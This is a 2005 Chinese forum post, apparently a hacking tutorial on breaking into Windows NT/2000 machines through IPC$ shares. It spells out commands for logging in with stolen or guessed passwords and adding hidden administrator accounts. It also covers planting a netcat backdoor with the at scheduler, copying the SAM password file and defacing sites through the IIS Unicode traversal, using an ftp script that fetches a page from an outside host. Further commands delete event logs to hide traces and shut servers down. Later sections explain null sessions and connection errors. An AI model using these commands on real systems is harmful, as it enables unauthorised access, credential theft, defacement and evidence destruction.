入侵基本功(IPC$基础)

jack 发表于 2005-11-13 07:15:32

入侵命令详解 -------------------------------------------------------------------------------- 1：NET 只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！ 这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1 net use \\127.0.0.1\ipc$ 123456 /user:hbx null密码为空 退出的命令是 net use \\127.0.0.1\ipc$ /delete -------------------------------- net share是查看主机共享资源我们用它建一个秘密共享目录吧net share me=c:\winnt\system32 这样这个机器就有了一个名为me的共享目录，而打开它就是winnt下的system32目录，如果你用win2000的系统就知这个目录有多重要了，如果不想要也好办net share me /delete 呵呵，没有了，是不是很方便的啊。 ---------------------- ---------------------- ---------------------- 下面的操作你必须登陆后才可以用.登陆的方法就在上面. ---------------------- ---------------------- ---------------------- 下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户. 我们加一个heibai的用户密码为lovechina net user heibai lovechina /add 只要显示命令成功，那么我们可以把他加入Administrator组了. net localgroup Administrators heibai /add ---------------------- 这里是讲映射对方的C盘，当然其他盘也可以，只要存在就行了.我们这里把对方的C盘映射到本地的Z盘. net use z:\\127.0.0.1\c$ ---------------------- net start telnet 这样可以打开对方的TELNET服务. ---------------------- 这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。 net user guest /active:yes ---------------------- net user guest /active:no这样这个guest的用户就又被禁用了 ---------------------- 这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！ net user guest lovechina 有人问到提高权限的问题下面就解决下 net localgroup administrators guest /add 将guest变为administrator net命令果然强大啊！ net view命令看对方开了共享 ------------------------------------------------------------------------------------------------------------- net user是查看所有用户列表，看看哪个用户是和你一样偷跑进来的，给他名给删掉，让他美， net user 用户名 /delete哈哈,他没有了,管他什么是不是管理员呢,不过我们还是查一下管理员组有什么用户吧,这样的用户才对我们有用嘛 net localgroup administrators就列出管理员组成员了,再查看一下administrator这个用户，因为这个是创建系统时建出来的，所以要看看他的系统是什么时间创建出来的 net user administrator，然后再查看别的管理员用户是什么时间创建的，如果相差太远，那可能是被别人偷偷跑来偷建的，一律del，安全第一哦................ --------------------------------------------------------------------------------------------------------------------------- 2:at 一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？ 那么需要用AT命令，这里假设你已经登陆了那个服务器。 ---------------------- 你首先要得到对方的时间， net time \\127.0.0.1 ---------------------- 将会返回一个时间，这里假设时间为12:1，现在需要新建一个作业，其ID=1 at \\127.0.0.1 12:3 nc.exe 这里假设了一个木马，名为NC.EXE，这个东西要在对方服务器上. 这里介绍一下NC，NC是NETCAT的简称，为了方便输入，一般会被改名.它是一个TELNET服务，端口为99. 等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. ----------------------------------------------------- at命令功能强大,下面可以打个比方: C:\> AT 22:30 Start C:\prettyboy.mp3 新加了一项作业，其作业 ID = 1 [现在我们新建立了一个任务在22:30分系统将自动播放歌曲] --------------------------------------------------------------------------------------------------------------------------- 3:telnet 这个命令非常实用，它可以与远方做连接，不过正常下需要密码、用户，不过你给对方种了木马，直接连到这个木马打开的端口. telnet 127.0.0.1 99 这样就可以连到对方的99端口.那你就可以在对方运行命令了，这个也就是肉鸡. --------------------------------------------------------------------------------------------------------------------------- 4:FTP 它可以将你的东西传到对方机子上，你可以去申请个支持FTP上传的空间，国内多的是，如果真的找不到，我给<A href="http://www.51.net/" target=_blank>http://WWW.51.NET</A>，不错的.当我们申?..约癋TP服务器. 在上传前需要登陆先，这里我们假设FTP服务器<A href="http://www.51.net/" target=_blank>WWW.51.NET</A>，用户名是HUCJS，密码是654321 ftp <A href="http://www.51.net/" target=_blank>www.51.net</A> 他会要求输入用户，成功后会要求输入密码. ---------------------- 下面先说上传，假设你需上传的文件是INDEX.HTM，它位于C:\下，传到对方D:\ get c:\index.htm d:\ 假设你要把对方C盘下的INDEX.HTM，下到你的机子的D盘下 put c:\index.htm d:\ -------------------------------------------------- 这里的问题是两个命令的解释正好弄反了，登陆ＦＴＰ服务器后get才是下载，而put命令是上传，这和tftp的命令正好相反，在tftp命令里get是上传put是下载，这下明白了吧，而且在ＦＴＰ服务器中不能用c:\和d:\这样来指明路径，这也是在tftp里面用的方法，FTP可不会执行的，不信你去试好了，正确应该这样上传文件put index.htm这样就足够了，装c盘根目录下的index.htm文件上传到FTP服务器的当前目录下，不喜欢就del index.htm删掉这文件，下载时先查看一下目录，dir然后看这个目录里有什么，有你要的你就get index.htm这样就把index.htm这个文件下载到你自己的c盘根目录下了。 -------------------------------------------------------------- get index.htm c:\inetpub\wwwroot\index.htm（这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm）" 这句的解释里就没有出现错误，呵呵，看来那以前的还是马虎所至吧 好了，总算找出错处了吧，再说下面吧。 --------------------------------------------------------------------------------------------------------------------------- 5:copy 下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好IPC$连接才有效。 这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下 copy index.htm \\127.0.0.1\c$\index.htm ---------------------- 如果你要复制到D盘下把C改为D，就行了！ copy index.htm \\127.0.0.1\d$\index.htm ---------------------- 如果你要把他复制到 WINNT 目录里 就要把输入 copy index.htm \\127.0.0.1\admin$\index.htm admin$是winnt --------------------- 要把对方的文件复制过来，顺便告诉大家 NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名 ---------------------- ---------------------- 下面就把127.0.0.1的数据库复制到本地C盘下 copy \\127.0.0.1\admin$\repair\sam._ c:\ 这个sam._这明显是NT主机的口令档，如果是win2000机器的口令文件应该是sam --------------------------------------------------------------------------------------------------------------------------- 6：set 如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用SET命令！ 下面是我得到的结果！我来分析它，只是找主页在那而已。 COMPUTERNAME=PENTIUMII ComSpec=D:\WINNT\system32\cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=*/* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST=当前登陆者的IP，这里本来是显示我的IP，被我删除了 HTTP_ACCEPT_ENCODING=gzip， deflate HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS=1 Os2LibPath=D:\WINNT\system32\os2\dll; OS=Windows_NT Path=D:\WINNT\system32;D:\WINNT PATHEXT=.COM;.EXE;.BAT;.CMD PATH_TRANSLATED=E:\vlroot主页放在的地址，只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3， GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0303 PROMPT=$P$G QUERY_STRING=/c+set REMOTE_ADDR=XX.XX.XX.XX REMOTE_HOST=XX.XX.XX.XX REQUEST_METHOD=GET SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe SERVER_NAME=XX.XX.XX.XX SERVER_PORT=80 SERVER_PORT_SECURE=0 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0 SystemDrive=D: SystemRoot=D:\WINNT TZ=GMT-9 USERPROFILE=D:\WINNT\Profiles\Default User windir=D:\WINNT 粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用这个方法才能100%的找到主页的名称，当你DIR这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名，这样只要看到和XX.XX.XX.XX看到的也面一模一样，那么这就是主页的名称了。 --------------------------------------------------------------------------------------------------------------------------- 7：nbtstat 如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就要用这个命令得到用户了。顺便告诉大家这是netbios，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！ 现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。 命令是 nbtstat -A XX.XX.XX.XX -A一定要大写哦。 这个我认为大不大写没有太大差别，用处还是一样的。 之后用net use \\对方IP 连接一下！ net view \\对方IP 查看对方共享文件夹 net use X: \\IP\对方共享文件映射对方共享文件夹成为本机的X盘 这就是139端口的基本用法！不过前提是必须对方开共享！ netstat -n看看谁连接你 ----------------- 下面是得到的结果。 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered MAC Address = 00-E0-29-14-35-BA PENTIUMII <00> UNIQUE PENTIUMII <20> UNIQUE ORAHOTOWN <00> GROUP ORAHOTOWN <1C> GROUP ORAHOTOWN <1B> UNIQUE PENTIUMII <03> UNIQUE INet~Services <1C> GROUP IS~PENTIUMII...<00> UNIQUE ORAHOTOWN <1E> GROUP ORAHOTOWN <1D> UNIQUE ..__MSBROWSE__.<01> GROUP 粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是不是看到了一窜数字，只要这窜数字是 <03> 的话，那他前面的就是用户. 这里的用户是PENTIUMII。 没有03说明:MAC没和IP捆在一起了 --------------------------------------------------------------------------------------------------------------------------- 8：Shutdown 关了对方的NT服务器的命令 Shutdown \\IP地址 t:20 20秒后将NT自动关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。 Telnet进去用命令或者是本地用什么软件重启对方电脑 shutdown -m \\计算机名称可以远程重起或关闭的 -------------------------------------------------------------------------------- 9：DIR 这个命令没什么好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。 你可以本地试下。 -------------------------------------------------------------------------------- 10：echo 著名的漏洞Unicode，这个命令可以简单的黑一下有这个漏洞的主机。 我们假设我们要把“南京大屠杀铁证如山，任何日本人不得抵赖！”写入index.htm，有2种方法，大家看看有什么区别。 ------------------------------------------------------- echo 南京大屠杀铁证如山，任何日本人不得抵赖！>index.htm echo 南京大屠杀铁证如山，任何日本人不得抵赖！>>index.htm ------------------------------------------------------- 第一个的意思是覆盖index.htm原有的内容，把“南京大屠杀铁证如山，任何日本人不得抵赖！”写进index.htm。 第二个的意思是把“南京大屠杀铁证如山，任何日本人不得抵赖！”加到index.htm里面。 ------------------------------------------------------- “>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。 这里说明一下，<和>是重定向命令只是一个是输入重定向另一个是输出重定向，比如我们在命令提示符下就会显示c:\>这个意思就是把C盘的命令权重定向给我们，同样：也是定向的命令也叫作管道，它是用来连接两个命令的管道，先执行管道左边的命令，再执行管道右边的命令，不过我是没能耐把DOS命令说明白的，想研究就买本dos大全看吧，够看半年的了。 ------------------------------------------------------- 大家可以本地试下。 可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页到对方的目录里。 1、首先，我们需要申请一个免费的主页空间。 2、用echo在可写目录下建立如下内容的txt文件：（以chinren服务器为例。） open upload.chinaren.com（你的FTP服务器，申请时你的空间提供商会给你的） cnhack（你申请时的用户名） test（你申请时的密码） get index.htm c:\inetpub\wwwroot\index.htm（这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm） bye（退出FTP对话，相当在98下的DOS，用EXIT退出DOS） --------------------------------------------- 具体的做法： 输入 echo open upload.chinaren.com> c:\cnhack.txt 输入 echo cnhack >> c:\cnhack.txt 输入 echo 39abs >> c:\cnhack.txt 输入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt 最后输入 ftp -s:c:\cnhack.txt （利用ftp的-s参数，执行文件里的内容。） 等命令完成时，文件已经下载到你指定的文件里了。 ----------------------- 注意：取得文件后，请删除cnhack.txt。（如果不删除，很容易会给别人看到你的密码。） 记得要 del c:\cnhack.txt -------------------------------------------------------------------------------- 11:attrib 这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。倒！不过有这个命令就别怕了。 attrib -r index.htm 这个命令是把index.htm的只读属性去掉。 如果把“-”改为“+”则是把这个文件的属性设置为只读 ---------------------- attrib +r index.htm 这个命令是把index.htm的属性设置为只读。 ---------------------------------------- attrib这个命令先要用来查属性，比如attrib 文件名，这样就显示出这个文件的属性了，它不止有R这个属性，其实一共有四种属性， a 档案属性 r 只读属性 h隐含属性 s系统属性，我们想用哪个就用哪个，我觉得把我们上传的文件加个隐含属性更有意思，，，，，继续挑那贴的错. --------------------------------------------------------------------------------------------------------------------------- 12:del 当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日志，当然要删除日志啦！想被捉吗。呵呵。 NT的日志有这些 del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\*.txt del C:\winnt\*.txt del C:\winnt\*.log 只要删除这些就可以了。有些系统NT安装在D盘或其他盘，就要把C改成其他盘。 Internet信息服务FTP日志默认位置：%systemroot%\system32\logfiles\msftpsvc1\，默认每天一个日志 Internet信息服务WWW日志默认位置：%systemroot%\system32\logfiles\w3svc1\，默认每天一个日志 Scheduler服务日志默认位置：%systemroot%\schedlgu.txt 以上日志在注册表里的键： 应用程序日志，安全日志，系统日志，DNS服务器日志，它们这些LOG文件在注册表中的： HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog 有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表，里面可查到以上日志的定位目录。 Schedluler服务日志在注册表中 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent -------------------------------------------------------------------- del确实是删除文件用的，log也确实是日志文件类型，不过按上面这种方法是不可能清理掉你自身的日志的，因为系统自动运行着日志记录，你在做这些时它一直都在记录着，并没有停止，大家也会常看到，有时删除某个文件时会提示系统正在占用拒绝删除的，呵呵，这就明白了，系统正在运行的东西已经驻留内存里，当然不能这样删除掉了，大家怕了吧，这样删等于帮别人清理了日志，没删自己那份啊，哈哈哈哈，要问我怎么清理，我只说大家还是用小榕的工具来清吧，那个又快又好，我们何必去用那些烦琐的命令行呢，尤其对生长在windows桌面操作下的人们那显然是太麻烦了，我推荐小榕的elsave工具，清理日志又快又干净，还省电呢，嘻嘻，我可不是做广告来的。 ------------------------------------------------------------------------- 借助第三方工具：如小榕的elsave.exe远程清除system,applicaton,security的软件， 使用方法很简单，首先利用获得的管理员账号与对方建立ipc会话，net use \\ip pass /us er: user 然后命令行下：elsave -s \\ip -l application -C，这样就删除了安全日志。 其实利用这个软件还可以进行备份日志，只要加一个参数 -f filename就可以了，在此不再详述。<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /><o:p></o:p>#1  IPC$命令详解 一摘要 二什么是ipc$ 三什么是空会话 四空会话可以做什么 五 ipc$所使用的端口 六 ipc管道在hack攻击中的意义 七 ipc$连接失败的常见原因 八复制文件失败的原因 九关于at命令和xp对ipc$的限制 十如何打开目标的IPC$共享以及其他共享 十一一些需要shell才能完成的命令 十二入侵中可能会用到的命令 十三对比过去和现今的ipc$入侵 十四如何防范ipc$入侵 十五 ipc$入侵问答精选 一摘要 注意：本文所讨论的各种情况均默认发生在win NT/2000环境下，win98将不在此次讨论之列。 二什么是ipc$ IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能，它有一个特点，即在同一时间内，两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些，微软的初衷都是为了方便管理员的管理，但在有意无意中，导致了系统安全性的降低。 平时我们总能听到有人在说ipc$漏洞，ipc$漏洞，其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说，一定是指微软自己安置的那个‘后门’：空会话（Null session）。那么什么是空会话呢？ 三什么是空会话 在介绍空会话之前，我们有必要了解一下一个安全会话是如何建立的。 在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的，建立成功的会话将成为一个安全隧道，建立双方通过它互通信息，这个过程的大致顺序如下： 1）会话请求者（客户）向会话接收者（服务器）传送一个数据包，请求安全隧道的建 立； 2）服务器产生一个随机的64位数（实现挑战）传送回客户； 3）客户取得这个由服务器产生的64位数，用试图建立会话的帐号的口令打乱它，将结 果返回到服务器（实现响应）； 4）服务器接受响应后发送给本地安全验证（LSA），LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号，核实本地发生；如果请求的帐号是一个域的帐号，响应传送到域控制器去核实。当对挑战的响应核实为正确后，一个访问令牌产生，然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。 以上是一个安全会话建立的大致过程，那么空会话又如何呢？ 空会话是在没有信任的情况下与服务器建立的会话（即未提供用户名与密码），但根据WIN2000的访问控制模型，空会话的建立同样需要提供一个令牌，可是空会话在建立过程中并没有经过用户信息的认证，所以这个令牌中不包含用户信息，因此，这个会话不能让系统间发送加密信息，但这并不表示空会话的令牌中不包含安全标识符SID（它标识了用户和所属组），对于一个空会话，LSA提供的令牌的SID是S-1-5-7，这就是空会话的SID，用户名是：ANONYMOUS LOGON（这个用户名是可以在用户列表中看到的，但是是不能在SAM数据库中找到，属于系统内置的帐号），这个访问令牌包含下面伪装的组： Everyone Network 在安全策略的限制下，这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢？ 四空会话可以做什么 对于NT，在默认安全设置下，借助空连接可以列举目标主机上的用户和共享，访问everyone权限的共享，访问小部分注册表等，并没有什么太大的利用价值；对2000作用更小，因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表，而且实现起来也不方便，需借助工具。 从这些我们可以看到，这种非信任会话并没有多大的用处，但从一次完整的ipc$入侵来看，空会话是一个不可缺少的跳板，因为我们从它那里可以得到户列表，而大多数弱口令扫描工具就是利用这个用户列表来进行口令猜解的，成功的导出用户列表大大增加了猜解的成功率，仅从这一点，足以说明空会话所带来的安全隐患，因此说空会话毫无用处的说法是不正确的。以下是空会话中能够使用的一些具体命令： 1 首先，我们先建立一个空连接（当然，这需要目标开放ipc$） 命令：net use \\ip\ipc$ "" /user:"" 注意：上面的命令包括四个空格，net与use中间有一个空格，use后面一个，密码左右各一个空格。 2 查看远程主机的共享资源 命令：net view \\ip 解释：前提是建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下面的结果，但此命令不能显示默认共享。 在 \\*.*.*.*的共享资源 资源共享名类型用途注释 ----------------------------------------------------------- NETLOGON Disk Logon server share SYSVOL Disk Logon server share 命令成功完成。 3 查看远程主机的当前时间 命令： net time \\ip 解释：用此命令可以得到一个远程主机的当前时间。 4 得到远程主机的NetBIOS用户名列表（需要打开自己的NBT） 命令：nbtstat -A ip 用此命令可以得到一个远程主机的NetBIOS用户名列表，返回如下结果： Node IpAddress: [*.*.*.*] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- SERVER <00> UNIQUE Registered OYAMANISHI-H <00> GROUP Registered OYAMANISHI-H <1C> GROUP Registered SERVER <20> UNIQUE Registered OYAMANISHI-H <1B> UNIQUE Registered OYAMANISHI-H <1E> GROUP Registered SERVER <03> UNIQUE Registered OYAMANISHI-H <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered INet~Services <1C> GROUP Registered IS~SERVER......<00> UNIQUE Registered MAC Address = 00-50-8B-9A-2D-37 以上就是我们经常使用空会话做的事情，好像也能获得不少东西哟，不过要注意一点：建立IPC$连接的操作会在Event Log中留下记录，不管你是否登录成功。 好了，那么下面我们就来看看ipc$所使用的端口是什么？ 五 ipc$所使用的端口 首先我们来了解一些基础知识： 1 SMB: (Server Message Block) Windows协议族，用于文件打印共享的服务； 2 NBT: (NETBios Over TCP/IP)使用137（UDP）138（UDP）139（TCP）端口实现基于TCP/IP协议的NETBIOS网络互联。 3 在WindowsNT中SMB基于NBT实现，即使用139（TCP）端口；而在Windows2000中，SMB除了基于NBT实现，还可以直接通过445端口实现。 有了这些基础知识，我们就可以进一步来讨论访问网络共享对端口的选择了： 对于win2000客户端（发起端）来说： 1 如果在允许NBT的情况下连接服务器时，客户端会同时尝试访问139和445端口，如果445端口有响应，那么就发送RST包给139端口断开连接，用455端口进行会话，当445端口无响应时，才使用139端口，如果两个端口都没有响应，则会话失败； 2 如果在禁止NBT的情况下连接服务器时，那么客户端只会尝试访问445端口，如果445端口无响应，那么会话失败。 对于win2000服务器端来说： 1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放（LISTENING）； 2 如果禁止NBT，那么只有445端口开放。 我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见，如果远程服务器没有监听139或445端口，ipc$会话是无法建立的。 六 ipc管道在hack攻击中的意义 ipc管道本来是微软为了方便管理员进行远程管理而设计的，但在入侵者看来，开放ipc管道的主机似乎更容易得手。通过ipc管道，我们可以远程调用一些系统函数（大多通过工具实现，但需要相应的权限），这往往是入侵成败的关键。如果不考虑这些，仅从传送文件这一方面，ipc管道已经给了入侵者莫大的支持，甚至已经成为了最重要的传输手段，因此你总能在各大论坛上看到一些朋友因为打不开目标机器的ipc管道而一筹莫展大呼救命。当然，我们也不能忽视权限在ipc管道中扮演的重要角色，想必你一定品尝过空会话的尴尬，没有权限，开启管道我们也无可奈何。但入侵者一旦获得了管理员的权限，那么ipc管道这把双刃剑将显示出它狰狞的一面。 七 ipc$连接失败的常见原因 以下是一些常见的导致ipc$连接失败的原因： 1 IPC连接是Windows NT及以上系统中特有的功能，由于其需要用到Windows NT中很多DLL函数，所以不能在Windows 9.x/Me系统中运行，也就是说只有nt/2000/xp才可以相互建立ipc$连接，98/me是不能建立ipc$连接的； 2 如果想成功的建立一个ipc$连接，就需要响应方开启ipc$共享，即使是空连接也是这样，如果响应方关闭了ipc$共享，将不能建立连接； 3 连接发起方未启动Lanmanworkstation服务（显示名为：Workstation）：它提供网络链结和通讯，没有它发起方无法发起连接请求； 4 响应方未启动Lanmanserver服务（显示名为：Server）：它提供了 RPC 支持、文件、打印以及命名管道共享，ipc$依赖于此服务，没有它主机将无法响应发起方的连接请求，不过没有它仍可发起ipc$连接； 5 响应方未启动NetLogon，它支持网络上计算机 pass-through 帐户登录身份（不过这种情况好像不多）； 6 响应方的139，445端口未处于监听状态或被防火墙屏蔽； 7 连接发起方未打开139，445端口； 8 用户名或者密码错误：如果发生这样的错误，系统将给你类似于'无法更新密码'这样的错误提示（显然空会话排除这种错误）； 9 命令输入错误：可能多了或少了空格，当用户名和密码中不包含空格时两边的双引号可以省略，如果密码为空，可以直接输入两个引号""即可； 10 如果在已经建立好连接的情况下对方重启计算机，那么ipc$连接将会自动断开，需要重新建立连接。 另外,你也可以根据返回的错误号分析原因： 错误号5，拒绝访问：很可能你使用的用户不是管理员权限的； 错误号51，Windows无法找到网络路径：网络有问题； 错误号53，找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）； 错误号67，找不到网络名：你的lanmanworkstation服务未启动或者目标删除了ipc$； 错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连； 错误号1326，未知的用户名或错误密码：原因很明显了； 错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动； 错误号2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。 八复制文件失败的原因 有些朋友虽然成功的建立了ipc$连接，但在copy时却遇到了这样那样的麻烦，无法复制成功，那么导致复制失败的常见原因又有哪些呢？ 1 对方未开启共享文件夹 这类错误出现的最多，占到50%以上。许多朋友在ipc$连接建立成功后，甚至都不知道对方是否有共享文件夹，就进行盲目复制，结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下你想要复制的共享文件夹是否存在（用软件查看当然更好），不要认为能建立ipc$连接就一定有共享文件夹存在。 2 向默认共享复制失败 这类错误也是大家经常犯的，主要有两个小方面： 1）错误的认为能建立ipc$连接的主机就一定开启了默认共享，因而在建立完连接之后马上向c$,d$,admin$之类的默认共享复制文件，一旦对方未开启默认共享，将导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享，并不能说明默认共享一定存在。ipc$共享与默认共享是两码事，ipc$共享是一个命名管道，并不是哪个实际的文件夹，而默认共享却是实实在在的共享文件夹； 2）由于net view \\IP 这个命令无法显示默认共享文件夹（因为默认共享带$），因此通过这个命令，我们并不能判断对方是否开启了默认共享，因此如果对方未开启默认共享，那么所有向默认共享进行的操作都不能成功；（不过大部分扫描软件在扫弱口令的同时，都能扫到默认共享目录，可以避免此类错误的发生） 要点：请大家一定区分ipc共享，默认共享，普通共享这三者的区别：ipc共享是一个管道，并不是实际的共享文件夹；默认共享是安装时默认打开的文件夹；普通共享是我们自己开启的可以设置权限的共享文件夹。 3用户权限不够，包括四种情形： 1）空连接向所有共享（默认共享和普通共享）复制时，权限是不够的； 2）向默认共享复制时，在Win2000 Pro版中，只有Administrators和Backup Operators组成员才可以，在Win2000 Server版本 Server Operatros组也可以访问到这些共享目录； 3）向普通共享复制时，要具有相应权限（即对方管理员事先设定的访问权限）； 4）对方可以通过防火墙或安全软件的设置，禁止外部访问共享； 注意： 1 不要认为administrator就一定具有管理员权限，管理员名称是可以改的 2 管理员可以访问默认共享的文件夹，但不一定能够访问普通的共享文件夹，因为管理员可以对普通的共享文件夹进行访问权限设置，如图6，管理员为D盘设置的访问权限为仅允许名为xinxin的用户对该文件夹进行完全访问，那么此时即使你拥有管理员权限，你仍然不能访问D盘。不过有意思的是，如果此时对方又开启了D$的默认共享，那么你却可以访问D$，从而绕过了权限限制，有兴趣的朋友可以自己做测试。 4被防火墙杀死或在局域网 还有一种情况，那就是也许你的复制操作已经成功，但当远程运行时，被防火墙杀掉了，导致找不到文件；或者你把木马复制到了局域网内的主机，导致连接失败（反向连接的木马不会发生这种情况）。如果你没有想到这种情况，你会以为是复制上出了问题，但实际你的复制操作已经成功了，只是运行时出了问题。 呵呵，大家也知道，ipc$连接在实际操作过程中会出现各种各样的问题，上面我所总结的只是一些常见错误，没说到的，大家可以给我提个醒儿。 九关于at命令和xp对ipc$的限制 本来还想说一下用at远程运行程序失败的原因，但考虑到at的成功率不是很高，问题也很多，在这里就不提它了（提的越多，用的人就越多），而是推荐大家用psexec.exe远程运行程序，假设想要远程机器执行本地c:\xinxin.exe文件，且管理员为administrator，密码为1234，那么输入下面的命令： psexec \\ip -u administrator -p 1234 -c c:\xinxin.exe 如果已经建立ipc连接，则-u -p这两个参数不需要，psexec.exe将自动拷贝文件到远程机器并运行。 本来xp中的ipc$也不想在这里讨论，想单独拿出来讨论，但看到越来越多的朋友很急切的提问为什么遇到xp的时候，大部分操作都很难成功。我在这里就简单提一下吧，在xp的默认安全选项中，任何远程访问仅被赋予来宾权限，也就是说即使你是用管理员帐户和密码，你所得到的权限也只是Guest，因此大部分操作都会因为权限不够而失败，而且到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了xp的管理员密码，我建议你尽量避开ipc管道。 十如何打开目标的IPC$共享以及其他共享 目标的ipc$不是轻易就能打开的，否则就要天下打乱了。你需要一个admin权限的shell，比如telnet，木马，cmd重定向等，然后在shell下执行： net share ipc$ 开放目标的ipc$共享； net share ipc$ /del 关闭目标的ipc$共享；如果你要给它开共享文件夹，你可以用： net share xinxin=c:这样就把它的c盘开为共享名为xinxin共享文件夹了。（可是我发现很多人错误的认为开共享文件夹的命令是net share c$，还大模大样的给菜鸟指指点点，真是误人子弟了）。再次声明，这些操作都是在shell下才能实现的。 十一一些需要shell才能完成的命令 看到很多教程这方面写的十分不准确，一些需要shell才能完成命令就简简单单的在ipc$连接下执行了，起了误导作用。那么下面我总结一下需要在shell才能完成的命令： 1 向远程主机建立用户，激活用户，修改用户密码，加入管理组的操作需要在shell下完成； 2 打开远程主机的ipc$共享，默认共享，普通共享的操作需要在shell下完成； 3 运行/关闭远程主机的服务，需要在shell下完成； 4 启动/杀掉远程主机的进程，也需要在shell下完成（用软件的情况下除外，如pskill）。 十二入侵中可能会用到的命令 为了这份教程的完整性，我列出了ipc$入侵中的一些常用命令，如果你已经掌握了这些命令，你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程，如果只适用于本地，你只能在获得远程主机的shell（如cmd，telnet等）后，才能向远程主机执行。 1 建立/删除ipc$连接的命令 1）建立空连接: net use \\127.0.0.1\ipc$ "" /user:"" 2）建立非空连接: net use \\127.0.0.1\ipc$ "密码" /user:"用户名" 3）删除连接: net use \\127.0.0.1\ipc$ /del 2 在ipc$连接中对远程主机的操作命令 1）查看远程主机的共享资源（看不到默认共享）: net view \\127.0.0.1 2）查看远程主机的当前时间: net time \\127.0.0.1 3）得到远程主机的netbios用户名列表: nbtstat -A 127.0.0.1 4）映射/删除远程共享: net use z: \\127.0.0.1\c 此命令将共享名为c的共享资源映射为本地z盘 net use z: /del 删除映射的z盘，其他盘类推 5）向远程主机复制文件: copy 路径\文件名 \\IP\共享目录名，如： copy c:\xinxin.exe \\127.0.0.1\c$ 即将c盘下的xinxin.exe复制到对方c盘内 当然，你也可以把远程主机上的文件复制到自己的机器里： copy \\127.0.0.1\c$\xinxin.exe c: 6）远程添加计划任务: at \\IP 时间程序名如： at \\127.0.0.0 11:00 xinxin.exe 注意：时间尽量使用24小时制；如果你打算运行的程序在系统默认搜索路径（比如system32/）下则不用加路径，否则必须加全路径 3 本地命令 1）查看本地主机的共享资源（可以看到本地的默认共享） net share 